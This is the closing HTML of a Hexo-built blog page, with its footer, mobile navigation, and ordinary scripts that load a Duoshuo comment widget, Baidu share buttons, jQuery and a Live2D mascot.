      Powered by <a href="//hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/xiangming/landscape-plus" target="_blank">Landscape-plus</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="totop"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->

<!-- 多说公共js代码 start -->
<script type="text/javascript">
var duoshuoQuery = {short_name:"reqianduan"};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0]
     || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
  </script>
<!-- 多说公共js代码 end -->


<!-- 百度分享 start -->

<div id="article-share-box" class="article-share-box">
  <div id="bdshare" class="bdsharebuttonbox article-share-links">
    <a class="article-share-weibo" data-cmd="tsina" title="分享到新浪微博"></a>
    <a class="article-share-weixin" data-cmd="weixin" title="分享到微信"></a>
    <a class="article-share-qq" data-cmd="sqq" title="分享到QQ"></a>
    <a class="article-share-renren" data-cmd="renren" title="分享到人人网"></a>
    <a class="article-share-more" data-cmd="more" title="更多"></a>
  </div>
</div>
<script>
  function SetShareData(cmd, config) {
    if (shareDataTitle && shareDataUrl) {
      config.bdText = shareDataTitle;
      config.bdUrl = shareDataUrl;
    }
    return config;
  }
  window._bd_share_config={
    "common":{onBeforeClick: SetShareData},
    "share":{"bdCustomStyle":"/css/bdshare.css"}
  };
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
